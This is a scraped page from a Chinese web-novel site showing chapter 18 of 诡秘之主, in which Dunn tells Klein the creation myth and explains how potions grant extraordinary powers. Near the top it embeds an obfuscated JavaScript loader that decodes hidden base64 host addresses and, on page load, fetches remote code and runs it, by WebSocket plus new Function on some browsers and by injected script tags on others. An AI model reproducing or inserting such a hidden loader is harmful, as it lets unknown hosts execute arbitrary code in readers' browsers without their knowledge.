笔趣阁

字:
关灯 护眼
笔趣阁 > 诡秘之主 > 第十八章 起源和原因
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x73\x49\x42\x6b\x73\x42\x45\x58\x66\x4f']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NramRrZnMucW9ybb3NtYWxsLmNvbbQ==','d3NzOi8vd3MMuc3luZ2d5LmNvbTo5MMDkw',window,document,['b','M']);}:function(){};

第十八章 起源和原因

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
    听到克莱恩的问题,邓恩望了眼窗外通往“查尼斯门”的走廊,拿出自己的烟斗,塞入烟丝和薄荷叶,然后放到鼻端,深深嗅了一口,嗓音略有飘忽地感慨道:
  
      “只有在家里,我才能肆无忌惮地享受烟草和薄荷叶混杂的美妙味道克莱恩,你知道创世神话吧?”
  
      “当然,我在教会周日学校接受启蒙时,就是靠夜之启示录认识单词,其中‘智慧书’和‘圣者书信’两章都提到了创世神话。”克莱恩边回想原主成为了碎片的记忆,边放缓了语速道,“造物主从混沌中醒来,打破了幽暗,制造了第一缕光,自己则彻底融入宇宙,化身为万物,祂的身躯成为大地,成为星辰,祂的眼睛一只变为太阳,一只化作红月,祂的部分血液奔腾为大海与江河,滋润和孕育了生命”
  
      说到这里,克莱恩不自觉停顿,半是因为后面相关记忆模糊,半是由于这创世神话和大吃货民族的盘古开天说有点相像..
  
      不同世界人民在神话传说上的想象力都有共通之处啊!
  
      见克莱恩遇到“难题”,邓恩笑了笑,帮他补充道:
  
      “祂的肺部衍化成精灵;祂的心脏衍化成巨人;祂的肝脏衍化成树人;祂的脑袋衍化成巨龙;祂的肾脏衍化成羽蛇;祂的头发衍化成不死鸟;祂的耳朵衍化成魔狼;祂的嘴巴和牙齿衍化成异种;祂的剩余体液衍化成海怪,其中的精华是娜迦;祂的胃部、祂的小肠大肠、祂身体的恶之部位衍化成恶魔、恶灵与各种未知的邪恶存在,祂的精神化为永恒烈阳、风暴之主、知识与智慧之神”
  
      “祂的智慧中诞生了人类,这就是第一纪,混沌纪元。”克莱恩讲出了最后一句,心头又感好笑又觉荒谬。
  
      作为键盘民俗学家,他还是第一次接触到“安排”如此详细的创世神话,详细到每个排得上号的种族由造物主哪部分衍化而来都具体细微地进行了罗列。
  
      真像在排排坐吃果果
  
      而且不止黑夜女神的典籍经文这么说,风暴之主、蒸汽与机械之神的教会也有类似的描述,没单独地抬高自身,贬低其余神灵
  
      这要么说明创世神话是真的事实,要么隐约透露出几大教会在史前,在第五纪之前,经过漫长的斗争和妥协,终于达成了一致
  
      想到这些,克莱恩猛地又有了个疑问,微皱眉头道:
  
      “我觉得这有些问题,为什么永恒烈阳、风暴之主、知识与智慧之神直接从造物主的精神里诞生,而女神不是?”
  
      在夜之启示录的史前记载里,黑夜女神直到第二纪末尾才苏醒,与风暴之主、永恒烈阳等神灵一块,庇佑和帮助人类渡过了大灾变,也就是俗称的第三纪,“灾变纪元”。
  
      大地母神和战神也是同一时期才登场,原名“工匠之神”的“蒸汽与机械之神”则要到第四纪才诞生。
  
      这么一来,众神之间的地位高低就似乎不言而喻了。
  
      谁更古老谁更正统,无比清晰!
  
      这在黑夜女神的信徒中也造成了一定困扰。
  
      邓恩.史密斯用另一只手托着烟斗,不答反问道:
  
      “你把女神的尊名完整叙述一遍。”
  
      克莱恩顿时有自己插了自己一刀的感觉,忙绞尽脑汁,竭力回想道:
  
      “祂是比星空更崇高,比永恒更久远的黑夜女神,也是绯红之主,隐秘之母,厄难与恐惧的女皇,安眠和寂静的领主。”
  
      还好,还好克莱恩的母亲是虔诚的黑夜女神信徒,她在世的时候每天傍晚和用餐都要来上一遍,哪怕原主的记忆变成了碎片,也不至于全部遗失。
  
      “绯红之主象征着什么?”邓恩用引导的口吻问道。
  
      “红月。”克莱恩刚一说完,就似乎明白了过来。
  
      “那红月又是造物主哪个部位衍化成的?”邓恩微笑再问。
  
      “单独的一只眼睛!”克莱恩与对方相视一笑。
  
      这可不比造物主精神一分为三形成的风暴之主等逼格差啊!
  
      至于大地母神和战神的教会应该也有类似的说法,只有蒸汽与机械之神“诞生”的实在太晚,找不到理由——他们的教会在之前一千多年里始终弱势,直到蒸汽机发明,抢占了先手,才真正与其他并立。
  
      邓恩摩挲着烟斗道:
  
      “人类从造物主的智慧里诞生,所以拥有聪明而非凡的脑袋,缺乏别的神奇能力,但是,从创世神话里,我们可以得到一个浅显而明确的结论,那就是万物同源而生。”
  
      “同源而生”克莱恩重复着最后几个单词。
  
      “根据这个结论,在神灵庇佑下与巨人、恶魔、异种等对抗的人类,逐渐摸索出了获得超凡之力的办法,那就是用恶灵,用巨龙,用怪物,用神奇树木、花朵或结晶的对应部位,配合其余材料,调制成魔药,然后服用吸收,掌握不同的能力,这是所有神秘学派系共同的常识。”
『加入书签,方便阅读』
热门推荐
长夜余火 快看那个大佬 有请小师叔 在港综成为传说 旧日之箓 诡异世界生存手册 诡秘之主 奥术神座 灭运图录 武道宗师